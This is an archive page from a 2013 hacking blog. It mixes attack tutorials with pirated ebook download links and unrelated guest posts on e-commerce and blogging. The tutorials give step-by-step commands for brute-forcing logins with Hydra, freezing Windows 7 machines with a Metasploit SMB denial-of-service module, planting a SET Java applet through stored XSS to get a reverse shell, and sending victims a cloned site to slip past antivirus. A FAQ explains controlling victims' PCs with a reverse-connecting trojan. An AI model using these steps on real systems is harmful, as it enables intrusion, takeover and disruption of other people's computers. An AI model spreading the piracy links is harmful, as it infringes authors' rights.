knox::Geeks: January 2013

Wednesday, January 30, 2013

Brute-Force attack using HYDRA

What is BRUTE-FORCE attack ?

A password attack that does not attempt to decrypt any information, but continue to try different passwords. For example, a brute-force attack may have a dictionary of all words or a listing of commonly used passwords. To gain access to an account using a brute-force attack, a program tries all available words it has to gain access to the account. Another type of brute-force attack is a program that runs through all letters or letters and numbers until it gets a match.

How to install THC-hydra ?

Open your terminal & type following command

(1)sudo bash

(2)wget http://freeworld.thc.org/releases/hydra-6.3-src.tar.gz

(3)After downloading ,we are going to extract it

tar -xvf hydra-6.3-src.tar.gz

(4)tar -xvf hydra-6.3-src.tar.gz

(5)./configure && make && install

(6)make install

How to use THC-hydra?

If you are attacking FTP service then first make sure to run an nmap scan for any open FTP ports (by default it should be 21)

Now in order to brute-force a specific login form you need to define the user-name (if you don't know it include a file containing some), the word-lists directory, the service attacking and form method and the page itself.

Type following command in terminal

hydra -l admin -P /root/pass 127.0.0.1 http-post-form "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"

The -l switch defines the username and the capital -L - a list of usernames for the brute-force attack (if you don't know the login).

The -p switch defines the password and the capital -P - the directory for the wordlists ( the -P is used almost always)

If we're attacking a web form over http and the method is post then we use "http-post-form" if the service is FTP simply use "ftp".

Another thing you should be aware of is that the variables username and password are not always the same. They different depending on the code.

They could be usr,pwd etc - it's not necessarily for them to be as in most cases "username" & "password". Just view the source and make sure what their names are.

Now there are a lot more options of Hydra. I'll explain some of them below no matter that they are included in the MAN page of hydra

-vV - The verbose mode. This mode shows you every login attempt hydra tries.

-s - We specify the port on which we're running our attack.

-x - For brute-force parameters generation. We define our charset and minimum & maximum length of it.

-R - Restores a previously aborted session of an attack.

-e ns - Checks for blank or no password fields.

Tuesday, January 22, 2013

Web application and audit framework

w3af is a complete environment for auditing and attacking web applications. This environment provides a solid platform for web vulnerability assessments and penetration tests.

Download:-

The framework can be downloaded from the project main page:http://www.w3af.com/#download

Installation:-

Some of the requirements are bundled with the distribution file, in order to make

the installation process easier for the novice user. The bundled requirements can

be found inside the extlib directory. Most of the libraries can be run from that

directory, but some others require an installation process, the installation steps

for these libraries are (as root):

cd w3af

cd extlib

cd fpconst0.7.2

python setup.py install

cd ..

cd SOAPpy

python setup.py install

cd ..

cd pyPdf

python setup.py install

Running w3af:-

w3af has two user interfaces, the console user interface (consoleUI) and the

graphical user interface (gtkUi). To use console interface type

./w3af_console

w3af>>>

If you are using w3af first time then I recommended you to use graphical user interface.

./w3af_gui

The graphical user interface allows you to perform all the actions that the

framework offers and features a much easier and faster way to start a scan and

analyze the results.

If you want to know more about plugins & console interface, here is document. You can Download it.

Sunday, January 20, 2013

Why High Speed Internet Crucial for Efficiency on the E-commerce site

An ecommerce host plays an important role in the smooth and successful running of your online business. In fact, without an efficient ecommerce host solution integrated along with your website, you will not be able to imagine on the accomplishment of an ecommerce business. Therefore, you must look out carefully for a high speed internet connectivity that helps in the growth of the ecommerce platform.

Speed

The speed of the different activities on your ecommerce store will basically depend on the velocity of the servers of your ecommerce host. Therefore, you need to ensure that the ecommerce host you have opted for makes use of high speed Internet connection.

Uptime

It not only depends on the speed, but the uptime of the servers of your ecommerce host also matters a lot. For instance, when a customer decides to make a purchase from your online store, he is quite happy with the fast speed of shopping and at the same time when he is just about to enter the credit card number the server of the ecommerce site gets down. Now hope you can imagine the impression of the customer on this particular ecommerce website due to this. This complication will not get this individual back to your online store ever again. There can even be worse situations arising than this one. Just think that the customer makes the payment, and before any individual could get the receipt, the server of your ecommerce host goes down. The customer visiting your website will feel like he is being cheated by your website. He will eventually lose faith on your business. So, what can be worse for your business than losing out customer trust? Therefore, ensure that you have selected an ecommerce host that puts forward 24*7 up time together with high-speed high connection.

Downloading

Easy and quick downloading of visual and audio files, folders, programs and software updates is quite necessary to any Internet user. If there is slow Internet connection it might take hours to get your audio and video files downloaded.

Streaming

If there is a video or audio onto your site, a high speed Internet connection will help you by not making you wait for your file to load and having it bring to a standstill halfway. A poor internet connection will be quite frustrating in that case.

Method of Payment

Another significant element which determines the efficiency of an ecommerce host is the type of payment they can have. Today you will find that the world of ecommerce is quite advanced and you should have a system on your ecommerce website so that the online store is able to accept various kinds of payment. Therefore, you need to ensure whether your ecommerce host is able to provide your eCommerce site such a kind of system. Your high speed internet connection will help your customers with the payment procedure easily without much hassle.

Phone Access

A high speed Internet service will facilitate you to connect the rest of the 21^st century that discuss over telephone making use of the Internet connectivity at the same time without having to opt for a second telephone connection.

Smooth Access to Product Detail Page

It is often seen that the product detail page is one area where most of the eCommerce websites fail. You will find high emphasis on the usability and design of the home page and the same effort is not present to the rest of the websites. It is often found that a user spends most of his or her time on the product detail page as he or she can seek all information that is required. If the details sited in the page enables better understanding of the user which is presented strikingly, your eCommerce website will be in demand surely. High speed Internet connectivity will get the product detail page effortlessly and smoothly.

So, this isn't the time period of 90’s anymore. High speed Internet connectivity could help you to do multi-task on things like checking your bank account, paying off bills, uploading various photos and finally listening to streaming audios. It will also help you to keep your sanity as you do not have to wait for long hours for your page to load. The above mentioned seven areas that benefit from high speed internet access are Speed, Uptime, Downloading, Streaming, Method of Payment, Phone Access and Product Detail Page.

Therefore, these are the basic reasons on why high speed Internet Connectivity is crucial for efficiency on the E-commerce site.

Author Bio:

Donna B. is a career counselor working for a university in the UK. She recommends that everyone should be on the virtual world and stay in touch with all the happenings. If you do not have the internet, you can run a check on what internet providers are available where you live at www.highspeed-internet.com.

DOS attack on windows-7 using metasploit

This module exploits a denial of service flaw in the Microsoft Windows SMB client on Windows 7 and Windows Server 2008 R2. To trigger this bug, run this module as a service and forces a vulnerable client to access the IP of this system as an SMB server. This can be accomplished by embedding a UNC path (\HOST\share\something) into a web page if the target is using Internet Explorer, or a Word

document otherwise.

(1)msfconsole

(2)use dos/windows/smb/ms10_006_negotiate_response_loop

(3)show options

(4)set SRVHOST I.P. of local machine

(5)exploit

[*] Starting the malicious SMB service...

[*] To trigger, the vulnerable client should try to access: \\I.P.\Shared\Anything

[*] Server started.

If the system that accessed that location is vulnerable, it will immediately freeze. To get out of that state, restart the system.

Wednesday, January 16, 2013

How to exploit stored xss using S.E.T?

Stored XSS is the most dangerous type of cross site scripting due to the fact that the user can be exploited just by visiting the web page where the vulnerability occurs.Also if that user happens to be the administrator of the website then this can lead to compromise the web application which is one of the reasons that the risk is higher than a reflected XSS.

(1)First I recommended you to view “How to fiind xss in website?” here.
(2)Open terminal & type following code in terminal.
sudo bash
cd /opt/set
./set
(3)Now select option 1 which is Social-Engineering Attacks.
(4)Select option 2 which is website attack vector.
(5)Select option 3which is Java Applet Attack Method.
(6)Select option 1 web -templetes.
(7)Select option 1 java Required.
(8)Now we will select payload & encoder. So we select simple Windows Reverse_TCP Meterpreter & shikata_ga_nai encoding.
(9)Put listener port:443 . Now metasploit will open.
(10)Now we can go back to the web application and we can try to insert the malicious JavaScript code in the comment field that we already know from before that is vulnerable to XSS.

(11)When a user will try to access the page that contains the malicious JavaScript the code will executed in his browser and a new window will come up that will contain the following message:

(12)After a while the user will notice a pop-up box that it will ask him if he wants to run the Java applet.

(13)If the user press on the Run button the malicious code will executed and it will return us a shell.
(14)sessions -i 1

Tuesday, January 15, 2013

Kingpin: How One Hacker Took Over the Billion-Dollar Cybercrime Underground

Kingpin: How One Hacker Took Over the Billion-Dollar Cybercrime Underground
ISBN: 0307588688 | 2011 | EPUB/MOBI | 288 pages | 3 MB

Former hacker Kevin Poulsen has, over the past decade, built a reputation as one of the top investigative reporters on the cybercrime beat. In Kingpin, he pours his unmatched access and expertise into book form for the first time, delivering a gripping cat-and-mouse narrative—and an unprecedented view into the twenty-first century's signature form of organized crime.

The word spread through the hacking underground like some unstoppable new virus: Someone—some brilliant, audacious crook—had just staged a hostile takeover of an online criminal network that siphoned billions of dollars from the US economy.

The FBI rushed to launch an ambitious undercover operation aimed at tracking down this new kingpin; other agencies around the world deployed dozens of moles and double agents. Together, the cybercops lured numerous unsuspecting hackers into their clutches. . . . Yet at every turn, their main quarry displayed an uncanny ability to sniff out their snitches and see through their plots.

The culprit they sought was the most unlikely of criminals: a brilliant programmer with a hippie ethic and a supervillain's double identity. As prominent "white-hat" hacker Max "Vision" Butler, he was a celebrity throughout the programming world, even serving as a consultant to the FBI. But as the black-hat "Iceman," he found in the world of data theft an irresistible opportunity to test his outsized abilities. He infiltrated thousands of computers around the country, sucking down millions of credit card numbers at will. He effortlessly hacked his fellow hackers, stealing their ill-gotten gains from under their noses. Together with a smooth-talking con artist, he ran a massive real-world crime ring.

And for years, he did it all with seeming impunity, even as countless rivals ran afoul of police.

Yet as he watched the fraudsters around him squabble, their ranks riddled with infiltrators, their methods inefficient, he began to see in their dysfunction the ultimate challenge: He would stage his coup and fix what was broken, run things as they should be run—even if it meant painting a bull's-eye on his forehead.

Through the story of this criminal's remarkable rise, and of law enforcement's quest to track him down, Kingpin lays bare the workings of a silent crime wave still affecting millions of Americans. In these pages, we are ushered into vast online-fraud supermarkets stocked with credit card numbers, counterfeit checks, hacked bank accounts, dead drops, and fake passports. We learn the workings of the numerous hacks—browser exploits, phishing attacks, Trojan horses, and much more—these fraudsters use to ply their trade, and trace the complex routes by which they turn stolen data into millions of dollars. And thanks to Poulsen's remarkable access to both cops and criminals, we step inside the quiet, desperate arms race that law enforcement continues to fight with these scammers today.

Ultimately, Kingpin is a journey into an underworld of startling scope and power, one in which ordinary American teenagers work hand in hand with murderous Russian mobsters and where a simple Wi-Fi connection can unleash a torrent of gold worth millions.

http://uploaded.net/file/i70o7ijr/kingpin.rar
or
http://ryushare.com/949336dcc41/kingpin.rar

Hacker's Delight (2nd Edition): Collection of Programming Hacks

In Hacker’s Delight, Second Edition, Hank Warren once again compiles an irresistible collection of programming hacks: timesaving techniques, algorithms, and tricks that help programmers build more elegant and efficient software, while also gaining deeper insights into their craft. Warren’s hacks are eminently practical, but they’re also intrinsically interesting, and sometimes unexpected, much like the solution to a great puzzle. They are, in a word, a delight to any programmer who is excited by the opportunity to improve.

Extensive additions in this edition include:
- A new chapter on cyclic redundancy checking (CRC), including routines for the commonly used CRC-32 code
- A new chapter on error correcting codes (ECC), including routines for the Hamming code
- More coverage of integer division by constants, including methods using only shifts and adds
- Computing remainders without computing a quotient
- More coverage of population count and counting leading zeros
- Array population count
- New algorithms for compress and expand
- An LRU algorithm
- Floating-point to/from integer conversions
- Approximate floating-point reciprocal square root routine
- A gallery of graphs of discrete functions
- Now with exercises and answers

Download
http://uploaded.net/file/3ie4idw7/7HVr6im9.epub
http://uploaded.net/file/2tuz8tcb/7HVr6im9.mobi

http://rapidgator.net/file/66222451/7HVr6im9.epub.html
http://rapidgator.net/file/66222454/7HVr6im9.mobi.html

http://ryushare.com/264a2b8e207d/7HVr6im9.epub
http://ryushare.com/264a2b8e207e/7HVr6im9.mobi

Download links:
(Become Premium for maximum speed, resumming ability and no waiting):
http://rapidgator.net/file/69820752/7HVr6im9.epub.html
http://rapidgator.net/file/69820746/7HVr6im9.mobi.html

Mirror:
http://ryushare.com/49c290b3991e/7HVr6im9.epub
http://ryushare.com/3a4c71bd4208/7HVr6im9.mobi

The Web Application Hacker's Handbook: Discovering and Exploiting Security Flaws

The Web Application Hacker's Handbook: Discovering and Exploiting Security Flaws
English | 2008 | 768 Pages | ISBN: 0470170778 | PDF | 11 MB

This book is a practical guide to discovering and exploiting security flaws in web applications. The authors explain each category of vulnerability using real-world examples, screen shots and code extracts. The book is extremely practical in focus, and describes in detail the steps involved in detecting and exploiting each kind of security weakness found within a variety of applications such as online banking, e-commerce and other web applications.

Download

http://uploaded.net/file/4lmygx2l/wwweb.hck.rar
or
http://ryushare.com/fefzaj0rnvdj/wwweb.hck.rar

Blogging Tips: Things to know how to write inspiring write-ups

Blogging in recent times has emerged as a medium of information sharing, wherein bloggers from distinct streams share their knowledge on a particular topic. The blogging scenario has become extremely competitive as bloggers vie with each other to secure a place in the challenging online world.

To come up to the reader’s aspiration, one needs to write inspiring content, which is qualitatively written with efforts put in true earnest.

1.) Qualitative research

To come with inspirational content that motivates readers to take action, you need to do qualitative research. Understand the perspective of the topic and analyze it from various angles. This will help you come up with authentic information that will help your readers develop better understanding of the topic.

Qualitative research will help you establish as a niche blog writer and connect in a better way with your readers.

2.) Write niche specific content

In order to come up with inspirational text, one needs to be niche specific. Choose the area of your interest and stick to it. With time and experience by your side, you will be able to bring quality in the content and make the same inspirational.

3.) Read a lot

A good blog writer reads a lot. Reading helps you broaden your horizon and learn new facts. These will definitely help you to come up with good text. The reflection of the same will be evident in your writing and the readers will be inspired lot to connect and share your vision with others.

4.) Discuss with your friends and family

Share your ideas with others in the family. This will help you learn new facts and come up with interesting information for the readers. Amongst your friends and family, you will be having people who have interests similar to you.

Information sharing with such people will help you to work on new ideas and concepts. Incorporate the learning in your writing. This will make the presentation informative as real life ideas and concepts are much practical and relevant.

5.) Observe people

There is no better learning than a practical experience. In our daily life, we meet many people who have distinct ideas and visions. Observe them and you will have many inspirational ideas to share with your readers.

6.) Follow the rules

Do not let your efforts put in for qualitative research go waste. Content writing has some rules. Follow these, else all your efforts put in to catch the eye of the reader will go waste. Optimum keyword usage, incorporation of short sentences and real life examples are some of the key requirements, in case you wish to come up with inspiring content. Sticking to the rule book is the imperative criterion for success and you need to follow these in true earnest.

Blog writing is a creative means of sharing your ideas and though with the readers. Follow the above listed steps and you are sure to come up with inspiring text that will catch the eye of the reader and help you to establish your competence in the field.

Author Bio: Brianne is a writer blogger. She loves writing, travelling and reading books. She contributes to Christopher Ryan Porter

Monday, January 14, 2013

How to view USB History of Windows PC?

USBDeview is a small utility that lists all USB devices that currently connected to your computer, as well as all USB devices that you previously used.
For each USB device, extended information is displayed: Device name/description, device type, serial number (for mass storage devices), the date/time that device was added, VendorID, ProductID, and more.
USBDeview also allows you to uninstall USB devices that you previously used, disconnect USB devices that are currently connected to your computer, as well as to disable and enable USB devices.

Download USBDeview For X32 System

Download USBDeview For X64 System
You can also use USBDeview on a remote computer, as long as you login to that computer with admin user.

Connecting To Remote Computer

The following command-line options allows you to connect to remote computers. You must login to the remote computer with admin user in order to use these options.

/remote <\\Computer Name>
Allows you to connect a single remote computer.
For Example:
USBDeview.exe /remote \\MyComp
/remotefile <Computers List File>
Allows you to connect multiple computers, and view all their USB activity in one window. The computers list file should be a simple Ascii text file with computer names separated by colon, semicolon, space, tab characters or CRLF.
For Example:
USBDeview.exe /remotefile "c:\temp\comp.txt"

In order to successfully get full admin access to the remote computer, read this Blog post: How to connect a remote Windows 7/Vista/XP computer with NirSoft utilities.

Connecting To external SYSTEM registry file

If you have the 'SYSTEM' registry file of external operating system, you can use the following command-line option to read the USB devices list from it:
/regfile <SYSTEM Registry File>

For Example:
USBDeview.exe /regfile "c:\temp\regfiles\SYSTEM"
USBDeview.exe /regfile "d:\windows\system32\config\SYSTEM"

This option has some limitations:

You cannot read a Registry file of Windows XP/2003/Vista from Windows 2000 Machine.
USBDeview works in read-only mode. (You cannot uninstall a device from external file)

Sunday, January 13, 2013

Hackers: Heroes of the Computer Revolution (25th Anniversary Edition)

Hackers: Heroes of the Computer Revolution (25th Anniversary Edition)
Publisher: O'Reilly Media 2010 | 528 Pages | ISBN: 1449388396 | PDF | 12 MB

This 25th anniversary edition of Steven Levy’s classic book traces the exploits of the computer revolution’s original hackers — those brilliant and eccentric nerds from the late 1950s through the early ’80s who took risks, bent the rules, and pushed the world in a radical new direction. With updated material from noteworthy hackers such as Bill Gates, Mark Zukerberg, Richard Stallman, and Steve Wozniak, Hackers is a fascinating story that begins in early computer research labs and leads to the first home computers.

..
Levy profiles the imaginative brainiacs who found clever and unorthodox solutions to computer engineering problems. They had a shared sense of values, known as “the hacker ethic,” that still thrives today. Hackers captures a seminal period in recent history when underground activities blazed a trail for today’s digital world, from MIT students finagling access to clunky computer-card machines to the DIY culture that spawned the Altair and the Apple II.

==] Purchase premium accounts
in order to enjoy unlimited downloads with resuming support

DOWNLOAD LINKS

http://extabit.com/file/28wce5048qpgk/h4ck.univer.pdf
or
http://ryushare.com/2f627a01e6d6/h4ck.univer.pdf

http://extabit.com/file/29g1vn63wy58e/
or
http://ryushare.com/jm8b5mhg3lib/h4ck.univer.pdf

Saturday, January 12, 2013

Design for Hackers - Reverse Engineering Beauty

Design for Hackers - Reverse Engineering Beauty
2011 | 352 Pages | ISBN: 1119998956 | EPUB | 34 MB

The smash hit introductory design book that debuted at #18 on Amazon

Hackers are able to accomplish so much in so little time because they come from a community that's built upon sharing knowledge. When it comes to programming, they can learn whatever they need to learn by reading manuals, or simply typing in a Google search. But learning design isn't so simple.

Many design books try to teach design through lists of "do's" and "don'ts." But hackers know you need a deeper understanding of something to really do it well. Design for Hackers takes apart design by "reverse-engineering" Impressionist painting, Renaissance sculpture, the Mac OS X Aqua interface, Twitter's web interface, and much more. You'll learn about color theory, typography, proportions, and design principles. This theoretical advice is mixed with concrete, actionable advice such as suggestions for color scheme tools, and a chart of "all of the fonts you'll ever need."
By the end of the book, you'll be seeing design through new eyes.

Download links:
(Become Premium for maximum speed, resumming ability and no waiting):
http://rapidgator.net/file/68127522/Design.For.Hackers.epub.html

Mirror:
http://ryushare.com/54ac886feb62/Design.For.Hackers.epub

http://uploaded.net/file/nrgpx66l/Design.For.Hackers.epub

http://rapidgator.net/file/66223037/Design.For.Hackers.epub.html

http://ryushare.com/bea14db9fee/Design.For.Hackers.epub

Friday, January 11, 2013

Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers

http://i49.fastpic.ru/big/2012/1208/b7/3054eedf028b78bf286bd92e6a7f31b7.jpg

Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers By TJ O'Connor

Violent Python shows you how to move from a theoretical understanding of offensive computing concepts to a practical implementation. Instead of relying on another attacker's tools, this book will teach you to forge your own weapons using the Python programming language. This book demonstrates how to write Python scripts to automate large-scale network attacks, extract metadata, and investigate forensic artifacts. It also shows how to write code to intercept and analyze network traffic using Python, craft and spoof wireless frames to attack wireless and Bluetooth devices, and how to data-mine popular social media websites and evade modern anti-virus.

- Demonstrates how to write Python scripts to automate large-scale network attacks, extract metadata, and investigate forensic artifacts.

- Write code to intercept and analyze network traffic using Python. Craft and spoof wireless frames to attack wireless and Bluetooth devices.

- Data-mine popular social media websites and evade modern anti-virus.

Buy Premium To Support Me & Get Resumable Support & Max Speed

Uploaded:
http://uploaded.net/file/k9rkp2xo/8mgsb5u0to-Violent.Python.A.Cookbook.for.Hackers.Forensic.Analysts.Penetration.Testers.and.Security.Engineers.pdf

Rapidgator:
http://rapidgator.net/file/62165639/8mgsb5u0to-Violent.Python.A.Cookbook.for.Hackers.Forensic.Analysts.Penetration.Testers.and.Security.Engineers.pdf.html

Ryushare:
http://ryushare.com/2nobmrm5cja0/8mgsb5u0to-Violent.Python.A.Cookbook.for.Hackers.Forensic.Analysts.Penetration.Testers.and.Security.Engineers.pdf

http://rapidgator.net/file/61886940/1597499579.pdf.html

Mirror:
http://ryushare.com/20d52faf6f30/1597499579.pdf

Thursday, January 10, 2013

Hacking FAQ: There is no easy way how to hack

Here you can get some hacking tutorials.

Hacking FAQ
****************

How do I hack? -
There is no easy way how to hack. Google is your best friend.. REMEMBER THAT! Read any information you can find on hacking. Read hacking forums and check out hacking websites. Learn a programming language like C++. Get a book like Hacking for Dummies which will teach you alot.

What do I need to be able to hack? -
Firstly you need to understand how your computers operating system works, networks and protocols works, security settings and general PC knowledge. After you understand how it works you need hacking tools which helps you to hack.

What is command prompt (cmd- the little dos Windows)? -
Go START, RUN and type in: "cmd"

What can I do in cmd? -
You can can do various things with it like run exploits or do a ping request.

Why does some of the hacking tools I download just close itself when I open them? -
Lot's of hacking tools are DOS based and has to be run through CMD. If you double click on the program it will open a DOS box and automaticly close the box. From CMD you can navigate to the directory which your hacking tool is stored in and run it from there. Other hacking tools are GUI ( graphical user interface ) based and it will open like a normal Windows based program.

What is a IP address? -
Every computer connected to the Internet or some network has a IP address. Goto START, RUN and type in "cmd" then type in "ipconfig" it will show you your IP adress or adresses. It will look something like this : 81.35.99.84. IP = internet protocol.

What can I do with a IP? -
Well you need someone's IP before you can hack, portscan or DOS them.

What is IP ping ? -
It's a command you can use to check if someone's IP address is online, to check it they connected to the Internet or a network. In command prompt type in "ping 192.168.0.21" - this will show you something like this :
____________________________________________________________
Pinging 192.168.0.21 with 32 bytes of data:
Reply from 192.168.0.21: bytes=32 time<1ms TTL=128
Reply from 192.168.0.21: bytes=32 time<1ms TTL=128
Reply from 192.168.0.21: bytes=32 time<1ms TTL=128
Reply from 192.168.0.21: bytes=32 time<1ms TTL=128
Ping statistics for 192.168.0.21:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
____________________________________________________________

That means you can succesfully PING IP 192.168.0.21 which means the IP is online. If you get a message "request timed out" it means the IP is not online.
Bytes=32 is the ammount of data which was sent to the host.
Time<1ms is the time the host took to reply.

Why can't I ping a certain IP? -
Either the IP is not online/ in use or the person your trying to ping is running a firewall which blocks ping requests or maybe your firewall is blocking outgoing ping requests

What is 127.0.0.1 IP? -
It is your PC's local loopback IP address.

Why do I have two IP addresses when I do a ipconfig? -
Well if your on a local LAN (Local area network) you will have a IP like 192.168.0.1. If your also directly connected to the internet you will have another IP address like 80.87.34.56. 192.168.0.1 is your local IP which you use to comunicate with your local internet network (lan) and 80.87.34.56 is your internet IP.

What is a static and dynamic IP address? -
Static means permanent set IP address - like a website will have a static IP address, it never changes. Dynamic means temporary IP address - dailing up to the Internet with a modem or most ADSL connections has dynamic IP's. Everytime you logon to the Internet your ISP ( Internet Service Provider ) will issue you a new IP address.

I have sent someone a trojan but I cannot connect to their PC? -
Either they are running a firewall which blocks you from connecting to their PC, or they are connected to the internet through a router.

What do I do when someone is behind a router and I want to control their PC with a trojan? -
You will need to use a trojan which uses reverse connections - meaning you don't connect to the host, the host connects to you. Bifrost is a trojan which has the mentioned function. Remember when someone is behind a router and your using IPstealer to get hold of their IP address, you are actually getting their routers IP, not their actual PC's IP. The router will have the persons internet IP (WAN IP) and their PC will have a difirent IP - their LAN IP.

How do I check if my own PC is infected with a trojan? -
Do a port scan on your PC and check which ports are open. If you find any open ports in this trojan port list you might be infected with a trojan. Download the trojan you think you might be infected with and connect to that specified port.

Bypass Antivirus using S.E.T

Bypass Antivirus using multyply injector shell code using SET & Metasploit.

Requirement:-

Victim`s O.S.- windows.

Attacker:- S.E.T ,Metasploit.

(1)Open terminal & type following command

sudo bash

cd /opt/set

./set

(2)Now select option 1 social engineering attack

(3)Select option 2 website attack vector

(4)Now we will choose the option 1 the Java Applet Attack Method

(5)Now we will choose option 2, “Site Cloner”

(6)Enter the URL to clone: http://www.google.com (but you can use any website to run the Java Applet)

(7)Now choose 16 “Multi PyInjector Shellcode Injection”,

(8)Port of the attacker computer. In this example I use port 443

(9)Select the payload you want to deliver via shellcodeexec press enter here

(10)Now again select Port of the attacker computer. In this example I use port 444 and 445

(11)Select the payload you want to deliver via shellcodeexec press enter here

(12)send your I.p. To victim. As soon as he open link & run java applet you have access of victim `s pc

(13)sessions -l

(14)sessions -i I.d

Wednesday, January 9, 2013

Blackhat USA 2012: Conference Official Recordings & Tools Released

Blackhat USA 2012 [2012, ENG]
English | h264, yuv420p, 1200x600, 14.98 fps | aac, 44100 Hz, mono | 14.38 GB
Genre: Video Training

Here are the videos for all the sessions of Blackhat USA 2012. It also includes a few of tools released during this conference

Content
-https://www.blackhat.com/html/bh-us-12/schedule/briefings-25.html
-https://www.blackhat.com/html/bh-us-12/schedule/briefings-26.html

Tuesday, January 8, 2013

Blackhat USA 2011: Conference Official Recordings

Blackhat USA 2011 [2011, ENG]
English | h264, yuv420p, 1200x600, 14.98 fps | aac, 44100 Hz, mono | 16.19 GB
Genre: Video Training

The official recordings from the Blackhat USA 2011 Conference

More:http://www.securelist.com/en/blog/208193069/BlackHat_USA_2011